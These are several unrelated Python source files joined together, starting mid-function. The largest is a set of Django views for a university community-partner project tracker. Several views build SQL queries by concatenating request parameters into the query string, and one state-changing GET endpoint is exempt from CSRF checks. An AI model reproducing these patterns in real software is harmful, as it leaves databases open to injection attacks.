debug_msg=None): curr_time = time() self._last_lap = curr_time-self._lap_control self._lap_control = curr_time self._laps.append(self._last_lap) if debug_msg: log.debug(debug_msg) return self._last_lap def elapsed_time(self, debug_msg=None): total_time = time()-self._start if debug_msg: log.debug(debug_msg) return total_time def laps(self): return self._laps def last_lap(self): return self._last_lap def reset(self, debug_msg=None): self.__init__(debug_msg) def stringify_response_received(message_j): event = message_j["method"] request_id = message_j["params"]["requestId"] response = message_j["params"]["response"] url = response["url"] status = response["status"] headers = response["headers"] return '%s %s %s %s %s' % (event, request_id, status, url, headers) def stringify_request_will_be_sent(message_j): event = message_j["method"] request_id = message_j["params"]["requestId"] request = message_j["params"]["request"] method = request["method"] url = request["url"] headers = request["headers"] return '%s %s %s %s %s' % (event, request_id, method, url, headers) EVENT_STRINGIFIERS = { "Network.responseReceived": stringify_response_received, "Network.requestWillBeSent": stringify_request_will_be_sent } evalml/pipelines/components/transformers/imputers/__init__.py """Components that impute missing values in the input data.""" from .per_column_imputer import PerColumnImputer from .simple_imputer import SimpleImputer from .imputer import Imputer from .target_imputer import TargetImputer # Generated by Django 3.1.13 on 2021-11-10 13:37 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("aidants_connect_web", "0075_auto_20211110_1434"), ] operations = [ migrations.AddField( model_name="habilitationrequest", name="origin", field=models.CharField( choices=[ ("datapass", "Datapass"), ("responsable", "Responsable Structure"), ("autre", "Autre"), ], default="autre", max_length=150, verbose_name="Origine", ), ), migrations.AlterField( model_name="habilitationrequest", name="status", field=models.CharField( choices=[ ("new", "Nouvelle"), ("processing", "En cours"), ("validated", "Validée"), ("refused", "Refusée"), ("cancelled", "Annulée"), ], default="new", max_length=150, verbose_name="État", ), ), ] import numpy import h5py import json h5 = h5py.File("data/geomodelgrids/USGS_SFCVM_detailed_v21-1.h5", "r") auxiliary = json.loads(h5.attrs["auxiliary"]) fault_blocks = sorted(auxiliary["fault_block_ids"].items(), key=lambda x: x[1]) print("Fault Blocks") for label, value in fault_blocks: lines = [ " ", " ", f" {value}", f" {label}", " Producer-defined", " ", " ", ] print("\n".join(lines)) zones = sorted(auxiliary["zone_ids"].items(), key=lambda x: x[1]) print("Zone Ids") for label, value in zones: lines = [ " ", " ", f" {value}", f" {label}", " Producer-defined", " ", " ", ] print("\n".join(lines)) for surface in h5["surfaces"]: dset = h5["surfaces"][surface][:] value_min = numpy.min(dset) value_max = numpy.max(dset) print(f"{surface} min={value_min:.1f} max={value_max:.1f}") value_ranges = {} for block in h5["blocks"]: dset = h5["blocks"][block] for index in range(5): value_name = h5.attrs["data_values"][index] value = dset[:,:,:,index].ravel() mask = value > -1.0e+8 value_min = numpy.min(value[mask]) value_max = numpy.max(value[mask]) value_nodata = True if numpy.sum(~mask) > 0 else False if not value_name in value_ranges: value_ranges[value_name] = (value_min, value_max, value_nodata) else: current_min, current_max, current_nodata = value_ranges[value_name] new_min = min(value_min, current_min) new_max = max(value_max, current_max) new_nodata = value_nodata or current_nodata value_ranges[value_name] = (new_min, new_max, new_nodata) for value_name, (value_min, value_max, value_nodata) in value_ranges.items(): print(f"{value_name} min={value_min:.1f} max={value_max:.1f}, nodata={value_nodata}") uno-isqa-8950/uno-cpi10-100 from decimal import * from django.db import connection from django.http import HttpResponse, HttpResponseRedirect, JsonResponse from numpy import shape import home from django.views.decorators.csrf import csrf_exempt from home.decorators import communitypartner_required, campuspartner_required, admin_required from home.views import gmaps from partners.views import district, countyData from projects.models import * from home.models import * from home.filters import * from partners.models import * from university.models import Course from .forms import ProjectCommunityPartnerForm, CourseForm, ProjectFormAdd, AddSubCategoryForm from django.contrib.auth.decorators import login_required from .models import Project,ProjectMission, ProjectCommunityPartner, ProjectCampusPartner, Status ,EngagementType, ActivityType, ProjectSubCategory from .forms import ProjectForm, ProjectMissionForm, ScndProjectMissionFormset, K12ChoiceForm, CecPartChoiceForm, OommCecPartChoiceForm from django.shortcuts import render, redirect, get_object_or_404 , get_list_or_404 from django.utils import timezone from .forms import ProjectMissionFormset,AddProjectCommunityPartnerForm, AddProjectCampusPartnerForm,ProjectForm2, ProjectMissionEditFormset from django.forms import inlineformset_factory, modelformset_factory from .filters import SearchProjectFilter import googlemaps from shapely.geometry import shape, Point import pandas as pd import json from django.db.models import Sum import datetime from django.conf import settings from googlemaps import Client # The imports below are for running sql queries for AllProjects Page from django.db import connection from UnoCPI import sqlfiles from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger sql=sqlfiles gmaps = Client(key=settings.GOOGLE_MAPS_API_KEY) @login_required() @communitypartner_required() def communitypartnerhome(request): usertype = User.objects.get(is_communitypartner=True) # if usertype.is_communitypartner == True: return render(request, 'community_partner_home.html', {'communitypartnerhome': communitypartnerhome,'usertype':usertype}) @login_required() def myProjects(request): projects_list=[] data_definition=DataDefinition.objects.all() #camp_part_user = CampusPartnerUser.objects.filter(user_id = request.user.id) #camp_part_id = camp_part_user.values_list('campus_partner_id', flat=True) #proj_camp = ProjectCampusPartner.objects.filter(campus_partner__in=camp_part_id) #project_ids = [project.project_name_id for project in proj_camp] getProjectIds = "select distinct project.id \ from \ projects_project as project, \ projects_projectcampuspartner as projectcampus \ where \ projectcampus.campus_partner_id in \ (select pc.id from partners_campuspartner pc, partners_campuspartneruser as cu \ where pc.id = cu.campus_partner_id \ and cu.user_id = "+str(request.user.id)+" \ ) \ and projectcampus.project_name_id = project.id" cursor = connection.cursor() #print('getProjectIds---',getProjectIds) cursor.execute(getProjectIds) projectIdResult = cursor.fetchall() project_ids = [obj[0] for obj in projectIdResult] #print('project_ids---',project_ids) cursor.execute(sql.my_projects, [project_ids]) for obj in cursor.fetchall(): projects_list.append( {"name": obj[0].split("(")[0], "projmisn": obj[1], "comm_part": obj[2], "camp_part": obj[3], "engagementType": obj[4], "academic_year": obj[5], "semester": obj[6], "status": obj[7], "startDate": obj[8], "endDate": obj[9], "outcomes": obj[10], "total_uno_students": obj[11], "total_uno_hours": obj[12], "total_uno_faculty": obj[13], "total_k12_students": obj[14], "total_k12_hours": obj[15], "total_other_community_members": obj[16], "activityType": obj[17], "description": obj[18], "project_type": obj[20], "pk":obj[19] , "end_semester": obj[21], "end_academic_year": obj[22], "sub_category": obj[23], "campus_lead_staff": obj[24], "mission_image": obj[25], "other_activity_type": obj[26], "other_sub_category":obj[27]}) cursor.close() return render(request, 'projects/myProjects.html', {'project': projects_list, 'data_definition':data_definition}) @login_required() def communitypartnerproject(request): projects_list = [] data_definition = DataDefinition.objects.all() # Get the campus partner id's related to the user comm_part_user = CommunityPartnerUser.objects.filter(user_id=request.user.id) comm_part_id = comm_part_user.values_list('community_partner_id', flat=True) proj_comm = ProjectCommunityPartner.objects.filter(community_partner__in=comm_part_id) project_ids = [project.project_name_id for project in proj_comm] cursor = connection.cursor() cursor.execute(sql.my_projects, [project_ids]) for obj in cursor.fetchall(): projects_list.append( {"name": obj[0].split("(")[0], "projmisn": obj[1], "comm_part": obj[2], "camp_part": obj[3], "engagementType": obj[4], "academic_year": obj[5], "semester": obj[6], "status": obj[7], "startDate": obj[8], "endDate": obj[9], "outcomes": obj[10], "total_uno_students": obj[11], "total_uno_hours": obj[12], "total_uno_faculty": obj[13], "total_k12_students": obj[14], "total_k12_hours": obj[15], "total_other_community_members": obj[16], "activityType": obj[17], "description": obj[18]}) return render(request, 'projects/community_partner_projects.html', {'project': projects_list,'data_definition':data_definition}) def ajax_load_project(request): name = request.GET.get('name') project_year = request.GET.get('year') projectnameandyear = name+': '+ project_year data = { 'is_taken': Project.objects.filter(project_name__icontains=projectnameandyear).exists() } return JsonResponse(data) @login_required @csrf_exempt def saveProjectAndRegister(request): projectId = request.GET.get('projectId') name = request.GET.get('name') description = request.GET.get('description') engagement_type = request.GET.get('engagement_type') activity_type = request.GET.get('activity_type') start_semester = request.GET.get('start_semester') start_academic_yr = request.GET.get('start_academic_yr') end_semester = request.GET.get('end_semester') end_academic_yr = request.GET.get('end_academic_yr') uno_students = request.GET.get('uno_students') uno_students_hrs = request.GET.get('uno_students_hrs') k12_students = request.GET.get('k12_students') k12_students_hrs = request.GET.get('k12_students_hrs') k12_involvment_flag = request.GET.get('k12_involvment_flag') comm_list = request.GET.get('selectedCommIds') campus_list = request.GET.get('selectedCampusIds') project_type = request.GET.get('project_type') lead_staff_list = request.GET.get('lead_staff_list') k12_flag_value = False year_in_project_name = '' if k12_involvment_flag == 'on': k12_flag_value = True if projectId is not None: project = Project.objects.get(id=projectId) else: project = Project(project_name=name) project.description=description project.semester=start_semester project.end_semester=end_semester project.total_uno_students=uno_students project.total_uno_hours=uno_students_hrs project.k12_flag=k12_flag_value project.total_k12_students=k12_students project.total_k12_hours=k12_students_hrs project.project_type=project_type if start_academic_yr != '' and start_academic_yr is not None: project.academic_year = AcademicYear.objects.get(id=start_academic_yr) year_in_project_naame = project.academic_year if end_academic_yr != '' and end_academic_yr is not None: project.end_academic_year = AcademicYear.objects.get(id=end_academic_yr) if engagement_type != '' and engagement_type is not None: project.engagement_type = EngagementType.objects.get(id=engagement_type) if activity_type != '' and activity_type != '0' and activity_type is not None: project.activity_type = ActivityType.objects.get(id=activity_type) if lead_staff_list != '' and lead_staff_list is not None: lead_name_list = [] if lead_staff_list.find(",") != -1: leadName_list =lead_staff_list.split(",") for leadName in leadName_list: lead_name_list.append(leadName) else: lead_name_list.append(lead_staff_list) project.campus_lead_staff = lead_name_list project.status = Status.objects.get(name='Drafts') project.save() projectId = project.pk project.project_name = name + ": " + str(year_in_project_naame) + " (" + str(projectId) + ")" project.save() if comm_list != '' or comm_list is not None: if comm_list.find(",") != -1: comm_Id_list =comm_list.split(",") else: comm_Id_list = comm_list for commId in comm_Id_list: comm_obj = CommunityPartner.objects.get(id=commId) proj_obj = Project.objects.get(id=projectId) projComm = ProjectCommunityPartner(project_name=proj_obj,community_partner=comm_obj) projComm.save() if campus_list != '' or campus_list is not None: if campus_list.find(",") != -1: camp_id_list =campus_list.split(",") else: camp_id_list = campus_list for campId in camp_id_list: camp_obj = CampusPartner.objects.get(id=campId) proj_obj = Project.objects.get(id=projectId) projCamp_obj = ProjectCampusPartner(project_name=proj_obj,campus_partner=camp_obj) projCamp_obj.save() data = {'save_projectId' : projectId} return JsonResponse(data) def saveFocusArea(request): selectedfocusarea = request.GET.get('focusarea') projectid = request.GET.get('projectId') print('selectedfocusarea--',selectedfocusarea) try: test = ProjectMission.objects.get(project_name_id=projectid, mission_type='Primary') except ProjectMission.DoesNotExist: test = None if test is not None: cursor = connection.cursor() cursor.execute(sqlfiles.editproj_updateprimarymission(str(selectedfocusarea), str(projectid)), params=None) else: cursor = connection.cursor() cursor.execute(sqlfiles.editproj_addprimarymission(str(selectedfocusarea), str(projectid)), params=None) data = {'projectid' : projectid} return JsonResponse(data) def getEngagemetActivityList(request): selectedEngagement = request.GET.get('selectedEngagement') activityList = [] if selectedEngagement is not None: engagementObj = EngagementType.objects.get(name=selectedEngagement) eng_act_obj = EngagementActivityType.objects.all().filter(EngagementTypeName=engagementObj) for act in eng_act_obj: actObj = ActivityType.objects.get(name=act.ActivityTypeName) activityList.append( {"name": actObj.name, "id": actObj.id}) data = {'activityList' : activityList} return JsonResponse(data) @login_required() def createProject(request): mission_details = modelformset_factory(ProjectMission, form=ProjectMissionFormset) # secondary_mission_details = modelformset_factory(ProjectMission, extra=1, form=ScndProjectMissionFormset) sub_category = modelformset_factory(ProjectSubCategory, extra=1, form=AddSubCategoryForm) proj_comm_part = modelformset_factory(ProjectCommunityPartner, extra=1, form=AddProjectCommunityPartnerForm) proj_campus_part = modelformset_factory(ProjectCampusPartner, extra=1, form=AddProjectCampusPartnerForm) data_definition = DataDefinition.objects.all() # Populate project name-Parimita request.POST.get('id_project_name') # if request.method == 'POST' and 'submit' in request.POST: if request.method == 'POST': project = ProjectFormAdd(request.POST) course = CourseForm(request.POST) categoryformset = sub_category(request.POST or None, prefix='sub_category') formset = mission_details(request.POST or None, prefix='mission') # formset4 = secondary_mission_details(request.POST or None, prefix='secondary_mission') formset2 = proj_comm_part(request.POST or None, prefix='community') formset3 = proj_campus_part(request.POST or None, prefix='campus') if project.is_valid() and formset.is_valid() and course.is_valid() and formset2.is_valid() and formset3.is_valid() and categoryformset.is_valid(): if request.POST.get('k12_flag'): project.k12_flag = True else: project.k12_flag = False proj = project.save() project_name = proj.project_name.strip() proj.project_name = project_name + ": " + str(proj.academic_year) + " (" + str(proj.id) + ")" eng = str(proj.engagement_type) address = proj.address_line1 stat = str(proj.status) if stat == 'Drafts': proj.save() mission_form = formset.save(commit=False) # secondary_mission_form = formset4.save(commit=False) sub_cat_form = categoryformset.save(commit=False) proj_comm_form = formset2.save(commit=False) proj_campus_form = formset3.save(commit=False) for k in proj_comm_form: k.project_name = proj k.save() for cat in sub_cat_form: cat.project_name = proj cat.save() subcategory = str(cat.sub_category); cursor = connection.cursor() cursor.execute(sqlfiles.createproj_othermission(subcategory), params=None) rows = cursor.fetchall() for mission in rows: id = str(mission[0]) cursor = connection.cursor() cursor.execute(sqlfiles.createproj_addothermission(id, str(proj.id)), params=None) for form in mission_form: form.project_name = proj form.mission_type = 'Primary' form.save() init = 0 t = 0 for c in proj_campus_form: c.project_name = proj c.save() proj.save() # return render(request, 'projects/draftadd_done.html', {'project': projects_list}) return HttpResponseRedirect('/draft-project-done') elif stat == 'Active': proj.save() if (address != 'N/A' and address != ''): # check if a community partner's address is there try: fulladdress = proj.address_line1 + ' ' + proj.city geocode_result = gmaps.geocode(fulladdress) # get the coordinates proj.latitude = geocode_result[0]['geometry']['location']['lat'] proj.longitude = geocode_result[0]['geometry']['location']['lng'] #### checking lat and long are incorrect if (proj.latitude == '0') or (proj.longitude == '0'): proj.save() proj.save() coord = Point([proj.longitude, proj.latitude]) for i in range(len(district)): # iterate through a list of district polygons property = district[i] polygon = shape(property['geometry']) # get the polygons if polygon.contains(coord): # check if a partner is in a polygon proj.legislative_district = property["id"] # assign the district number to a partner proj.save() for m in range(len(countyData)): # iterate through the County Geojson properties2 = countyData[m] polygon = shape(properties2['geometry']) # get the polygon if polygon.contains(coord): # check if the partner in question belongs to a polygon proj.county = properties2['properties']['NAME'] proj.median_household_income = properties2['properties']['Income'] proj.save() except: proj.save() mission_form = formset.save(commit=False) # secondary_mission_form = formset4.save(commit=False) sub_cat_form = categoryformset.save(commit=False) proj_comm_form = formset2.save(commit=False) proj_campus_form = formset3.save(commit=False) for k in proj_comm_form: k.project_name = proj k.save() for cat in sub_cat_form: cat.project_name = proj cat.save() subcategory = str(cat.sub_category); cursor = connection.cursor() cursor.execute(sqlfiles.createproj_othermission(subcategory), params=None) rows = cursor.fetchall() for mission in rows: id = str(mission[0]) cursor = connection.cursor() cursor.execute(sqlfiles.createproj_addothermission(id, str(proj.id)), params=None) for form in mission_form: form.project_name = proj form.mission_type = 'Primary' form.save() init = 0 t = 0 for c in proj_campus_form: c.project_name = proj c.save() proj.save() # return render(request, 'projects/adminconfirmAddProject.html', {'project': projects_list}) if request.user.is_superuser == True: return HttpResponseRedirect('/adminsubmit_project_done') else: return HttpResponseRedirect('/submit-project-done') else: month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year) + "-" + str(year + 1)[-2:] else: a_year = str(year - 1) + "-" + str(year)[-2:] # test = AcademicYear.objects.get(academic_year=a_year) # project =ProjectFormAdd(initial={"academic_year":test}) try: test = AcademicYear.objects.get(academic_year=a_year) except AcademicYear.DoesNotExist: test = None if test is not None: project = ProjectFormAdd(initial={"academic_year": test}) else: project = ProjectFormAdd() course = CourseForm() formset = mission_details(queryset=ProjectMission.objects.none(), prefix='mission') # formset4 = secondary_mission_details(queryset=ProjectMission.objects.none(), prefix='secondary_mission') categoryformset = sub_category(queryset=ProjectSubCategory.objects.none(), prefix='sub_category') formset2 = proj_comm_part(queryset=ProjectCommunityPartner.objects.none(), prefix='community') formset3 = proj_campus_part(queryset=ProjectCampusPartner.objects.none(), prefix='campus') return render(request, 'projects/createProject.html', {'project': project, 'formset': formset, 'formset3': formset3, 'course': course, 'data_definition': data_definition, 'formset2': formset2, 'categoryformset': categoryformset}) @login_required() def editProject(request, pk): project_mission = ProjectMissionEditFormset() proj_comm_part_edit = inlineformset_factory(Project, ProjectCommunityPartner, extra=0, min_num=1, can_delete=True, form=AddProjectCommunityPartnerForm) proj_campus_part_edit = inlineformset_factory(Project, ProjectCampusPartner, extra=0, min_num=1, can_delete=True, form=AddProjectCampusPartnerForm) sub_category_edit = inlineformset_factory(Project, ProjectSubCategory, extra=0, min_num=1, can_delete=True, form=AddSubCategoryForm) data_definition = DataDefinition.objects.all() if request.method == 'POST': # cache.clear() proj_edit = Project.objects.filter(id=pk) # projectName = request.POST['projectName'].strip() # p = request.POST # focus_area = request.GET['id_mission_area'] # print(focus_area) for x in proj_edit: project = ProjectFormAdd(request.POST or None, instance=x) course = CourseForm(request.POST or None, instance=x) formset_comm_details = proj_comm_part_edit(request.POST or None, request.FILES, instance=x, prefix='community_edit') formset_camp_details = proj_campus_part_edit(request.POST or None, request.FILES, instance=x, prefix='campus_edit') formset_subcatdetails = sub_category_edit(request.POST or None, request.FILES, instance=x, prefix='sub_category_edit') if project.is_valid() and formset_camp_details.is_valid() and formset_comm_details.is_valid() and formset_subcatdetails.is_valid(): instances = project.save() instances.project_name = instances.project_name.split(":")[0] + ": " + str( instances.academic_year) + " (" + pk + ")" stat = str(instances.status) if stat == 'Drafts': instances.save() compar = formset_comm_details.save() campar = formset_camp_details.save() subcat = formset_subcatdetails.save() # focus_areas = focusarea['id_mission'] # focus_areas = request.POST.get('id_mission_area',None) # print(focus_areas) # for k in pm: # k.project_name = instances # k.save() for p in compar: p.project_name = instances p.save() for l in campar: l.project_name = instances l.save() for sc in subcat: sc.project_name = instances sc.save() subcategory = str(sc.sub_category); cursor = connection.cursor() cursor.execute(sqlfiles.createproj_othermission(subcategory), params=None) rows = cursor.fetchall() # print(rows[0]) # projmission = projectmission.save() for mission in rows: id = str(mission[0]) # print(id) cursor = connection.cursor() cursor.execute(sqlfiles.createproj_addothermission(id, str(pk)), params=None) #return HttpResponseRedirect("/myDrafts") return HttpResponseRedirect('/draft-project-done') else: address = instances.address_line1 if (address != 'N/A' and address != ''): # check if a community partner's address is there instances.address_update_flag = 'True' try: fulladdress = instances.address_line1 + ' ' + instances.city geocode_result = gmaps.geocode(fulladdress) # get the coordinates instances.latitude = geocode_result[0]['geometry']['location']['lat'] instances.longitude = geocode_result[0]['geometry']['location']['lng'] #### checking lat and long are incorrect if (instances.latitude == '0') or (instances.longitude == '0'): instances.save() instances.save() coord = Point([instances.longitude, instances.latitude]) for i in range(len(district)): # iterate through a list of district polygons property = district[i] polygon = shape(property['geometry']) # get the polygons if polygon.contains(coord): # check if a partner is in a polygon instances.legislative_district = property["id"] # assign the district number to a partner instances.save() for m in range(len(countyData)): # iterate through the County Geojson properties2 = countyData[m] polygon = shape(properties2['geometry']) # get the polygon if polygon.contains(coord): # check if the partner in question belongs to a polygon instances.county = properties2['properties']['NAME'] instances.median_household_income = properties2['properties']['Income'] instances.save() except: instances.save() instances.save() # pm = formset_missiondetails.save() compar = formset_comm_details.save() campar = formset_camp_details.save() subcat = formset_subcatdetails.save() # for k in pm: # k.project_name = instances # k.save() for p in compar: p.project_name = instances p.save() for l in campar: l.project_name = instances l.save() for sc in subcat: sc.project_name = instances sc.save() subcategory = str(sc.sub_category); cursor = connection.cursor() cursor.execute(sqlfiles.createproj_othermission(subcategory), params=None) rows = cursor.fetchall() # print(rows[0]) # projmission = projectmission.save() for mission in rows: id = str(mission[0]) # print(id) cursor = connection.cursor() cursor.execute(sqlfiles.createproj_addothermission(id, str(pk)), params=None) if request.user.is_superuser == True: #return HttpResponseRedirect('/allProjects') return HttpResponseRedirect('/adminsubmit_project_done') else: #return HttpResponseRedirect('/myProjects') return HttpResponseRedirect('/submit-project-done') else: proj_edit = Project.objects.get(id=pk) engagementObj = proj_edit.engagement_type selectedActivity = proj_edit.activity_type eng_act_obj = EngagementActivityType.objects.all().filter(EngagementTypeName=engagementObj) activityList = [] for act in eng_act_obj: actObj = ActivityType.objects.get(name=act.ActivityTypeName) # activityList.append({"name": actObj.name, "id": actObj.id}) if str(actObj.name)== str(selectedActivity): selected = 'selected' activityList.append({"name": actObj.name, "id": actObj.id, "selected":selected}) else: activityList.append({"name": actObj.name, "id": actObj.id}) # for x in proj_edit: x = proj_edit project = ProjectForm2(request.POST or None, instance=x) course = CourseForm(instance=x) project_mission = ProjectMissionEditFormset() project_all_missions = MissionArea.objects.all() # mission_areas = [] # for miss in project_all_missions: # print('missions-----', miss) # mission_areas.append({"name": miss.mission_name, "id": miss.id}) # print(mission_areas) try: test = ProjectMission.objects.get(project_name_id=pk,mission_type = 'Primary') except ProjectMission.DoesNotExist: test = None if test is not None: proj_mission = ProjectMission.objects.get(project_name_id=pk,mission_type = 'Primary') else: proj_mission = 'none' # print(proj_mission) mission_areas = [] for miss in project_all_missions: # print(miss.mission_name) if miss.mission_name == str(proj_mission): selected = 'selected' mission_areas.append({"name": miss.mission_name, "id": miss.id,'selected':selected}) else: mission_areas.append({"name": miss.mission_name, "id": miss.id}) # print(mission_areas) # selectedMisson = proj_mission.mission_id proj_comm_part = ProjectCommunityPartner.objects.filter(project_name_id=pk) proj_camp_part = ProjectCampusPartner.objects.filter(project_name_id=pk) # course_details = course(instance= x) # formset_missiondetails = mission_edit_details(instance=x, prefix='mission_edit') formset_comm_details = proj_comm_part_edit(instance=x, prefix='community_edit') formset_camp_details = proj_campus_part_edit(instance=x, prefix='campus_edit') formset_subcat_details = sub_category_edit(instance=x, prefix='sub_category_edit') return render(request, 'projects/editProject.html', {'project': project, 'course': course, 'project_mission':project_mission, 'mission_areas':mission_areas, # 'formset_missiondetails': formset_missiondetails, 'formset_comm_details': formset_comm_details, 'formset_camp_details': formset_camp_details, 'formset_subcat_details': formset_subcat_details, 'projectId': pk, 'activityList': activityList, 'selectedActivity': selectedActivity, 'selectedMission':proj_mission, 'data_definition':data_definition}) @login_required() def showAllProjects(request): selectedprojectId = request.GET.get('proj_id_list', None) data_definition=DataDefinition.objects.all() missions = ProjectMissionFilter(request.GET, queryset=ProjectMission.objects.filter(mission_type='Primary')) status_draft = Status.objects.filter(name='Drafts') project_filter = ProjectFilter(request.GET, queryset=Project.objects.all().exclude(status__in=status_draft)) communityPartners = communityPartnerFilter(request.GET, queryset=CommunityPartner.objects.all()) campusPartners = CampusFilter(request.GET, queryset=CampusPartner.objects.all()) # campus_filtered_ids = campusPartners.qs.values_list('id', flat=True) # campus_filtered_ids = [campus.id for campus in campusPartners.qs] # campus_project_filter = ProjectCampusFilter(request.GET, queryset=ProjectCampusPartner.objects.filter( # campus_partner_id__in=campus_filtered_ids)) projects_list=[] cursor = connection.cursor() k12_selection = request.GET.get('k12_flag', None) # k12_init_selection = "All" # if k12_selection is None: # k12_selection = k12_init_selection k12_choices = K12ChoiceForm(initial={'k12_choice': k12_selection}) engagement_type_filter = request.GET.get('engagement_type', None) if engagement_type_filter is None or engagement_type_filter == "All" or engagement_type_filter == '': eng_type_cond = '%' else: eng_type_cond = engagement_type_filter mission_type_filter = request.GET.get('mission', None) if mission_type_filter is None or mission_type_filter == "All" or mission_type_filter == '': mission_type_cond = '%' else: mission_type_cond = mission_type_filter community_type_filter = request.GET.get('community_type', None) if community_type_filter is None or community_type_filter == "All" or community_type_filter == '': community_type_cond = '%' else: community_type_cond = community_type_filter campus_partner_filter = request.GET.get('campus_partner', None) if campus_partner_filter is None or campus_partner_filter == "All" or campus_partner_filter == '': campus_partner_cond = '%' campus_id = 0 else: campus_partner_cond = campus_partner_filter campus_id = int(campus_partner_filter) college_unit_filter = request.GET.get('college_name', None) if college_unit_filter is None or college_unit_filter == "All" or college_unit_filter == '': college_unit_cond = '%' campus_filter_qs = CampusPartner.objects.all() else: college_unit_cond = college_unit_filter campus_filter_qs = CampusPartner.objects.filter(college_name_id=college_unit_cond) campus_filter = [{'name': m.name, 'id': m.id} for m in campus_filter_qs] academic_year_filter = request.GET.get('academic_year', None) acad_years = AcademicYear.objects.all() yrs = [] month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year - 1) + "-" + str(year)[-2:] else: a_year = str(year - 2) + "-" + str(year - 1)[-2:] for e in acad_years: yrs.append(e.id) try: acad_year = AcademicYear.objects.get(academic_year=a_year).id default_yr_id = acad_year except AcademicYear.DoesNotExist: default_yr_id = max(yrs) max_yr_id = max(yrs) if academic_year_filter is None or academic_year_filter == '': academic_start_year_cond = int(default_yr_id) academic_end_year_cond = int(default_yr_id) elif academic_year_filter == "All": academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 else: academic_start_year_cond = int(academic_year_filter) academic_end_year_cond = int(academic_year_filter) K12_filter = request.GET.get('k12_flag', None) if K12_filter is None or K12_filter == "All" or K12_filter == '': K12_filter_cond = '%' elif K12_filter == 'Yes': K12_filter_cond = 't' elif K12_filter == 'No': K12_filter_cond = 'f' cec_part_init_selection = "All" cec_part_selection = request.GET.get('weitz_cec_part', None) if cec_part_selection is None or cec_part_selection == "All" or cec_part_selection == '': # cec_part_selection = cec_part_init_selection cec_comm_part_cond = '%' cec_camp_part_cond = '%' elif cec_part_selection == "CURR_COMM": cec_comm_part_cond = 'Current' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_COMM": cec_comm_part_cond = 'Former' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Former' elif cec_part_selection == "CURR_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Current' cursor = connection.cursor() project_start_query = "select distinct p.project_name \ , array_agg(distinct hm.mission_name) mission_area \ , array_agg(distinct pc.name) CommPartners \ , array_agg(distinct c.name) CampPartners \ , array_agg(distinct e.name) engagement_type \ , pa.academic_year \ , p.semester \ , status.name status \ , case when p.start_date is null then 'None' end start_date \ , case when p.end_date is null then 'None' end end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name activity_type \ , p.description \ , p.project_type project_type \ , p.end_semester end_semester \ , ea.academic_year end_academic_year \ , array_agg(distinct s.sub_category) sub_category \ , p.campus_lead_staff campus_lead_staff \ , hm.mission_image_url mission_image \ , p.other_activity_type act_type \ , p.other_sub_category other_subCat \ , array_agg(s.sub_category_tags) sub_tags \ from projects_project p \ join projects_projectmission m on p.id = m.project_name_id and lower(m.mission_type) = 'primary' \ left join home_missionarea hm on hm.id = m.mission_id \ left join projects_engagementtype e on e.id = p.engagement_type_id \ left join projects_projectcommunitypartner pp on p.id = pp.project_name_id \ left join partners_communitypartner pc on pp.community_partner_id = pc.id \ left join projects_projectcampuspartner pp2 on p.id = pp2.project_name_id \ left join partners_campuspartner c on pp2.campus_partner_id = c.id \ left join projects_academicyear pa on p.academic_year_id = pa.id \ left join projects_academicyear ea on p.end_academic_year_id = ea.id \ left join projects_activitytype a on p.activity_type_id = a.id \ left join projects_projectsubcategory psub on psub.project_name_id = p.id \ left join projects_subcategory s on psub.sub_category_id = s.id \ left join projects_status status on status.id = p.status_id \ where status.name !='Drafts' and \ ((p.academic_year_id <= " + str(academic_start_year_cond) + ") AND \ (COALESCE(p.end_academic_year_id, p.academic_year_id) >= "+ str(academic_end_year_cond)+")) " clause_query = "" if eng_type_cond !='%': clause_query +=" and e.id::text like '"+ eng_type_cond +"'" if mission_type_cond !='%': clause_query += " and m.mission_id::text like '"+ mission_type_cond + "'" if campus_partner_cond !='%': clause_query += " and pp2.campus_partner_id::text like '" + campus_partner_cond +"'" if college_unit_cond != '%': clause_query +=" and c.college_name_id::text like '" + college_unit_cond +"' " if K12_filter_cond !='%': clause_query +=" and p.k12_flag ='" + K12_filter_cond + "'" if cec_camp_part_cond != '%': clause_query += " and c.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '"+ cec_camp_part_cond +"')" if community_type_cond != '%': clause_query += " and pc.community_type_id::text like '" + community_type_cond + "'" if cec_comm_part_cond != '%': clause_query += " and pc.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '" + cec_comm_part_cond + "')" project_end_query = project_start_query + clause_query +" group by p.project_name \ , pa.academic_year \ , p.semester \ , status.name \ , p.start_date \ , p.end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name \ , p.description \ , project_type \ , end_semester \ , end_academic_year \ , campus_lead_staff \ , mission_image \ , act_type \ , other_subCat \ order by pa.academic_year desc; " #cursor.execute(sql.all_projects_sql, params) cursor.execute(project_end_query) cec_part_choices = CecPartChoiceForm(initial={'cec_choice': cec_part_selection}) if selectedprojectId is not None: if selectedprojectId.find(",") != -1: project_name_list = selectedprojectId.split(",") cursor.execute(sqlfiles.showSelectedProjects(tuple(project_name_list)), params=None) # cursor.execute(sql.search_projects_sql,str(tuple(project_name_list))) else: projId = "("+str(selectedprojectId)+")" cursor.execute(sqlfiles.showSelectedProjects(projId), params=None) #cursor.execute(sql.search_projects_sql,project_name_list) # else: # # cursor.execute(sql.all_projects_sql) for obj in cursor.fetchall(): proj_names = obj[0] name = '' Projectname = proj_names.split(':') if len(Projectname) >= 2 and Projectname[1]: for i in range(0, len(Projectname) - 1): name += Projectname[i] else: for i in Projectname: name = name + str(i) projects_list.append({"name": name, "projmisn": obj[1],"comm_part": obj[2], "camp_part": obj[3],"engagementType": obj[4], "academic_year": obj[5], "semester": obj[6], "status": obj[7],"startDate": obj[8], "endDate": obj[9],"outcomes": obj[10], "total_uno_students": obj[11], "total_uno_hours": obj[12], 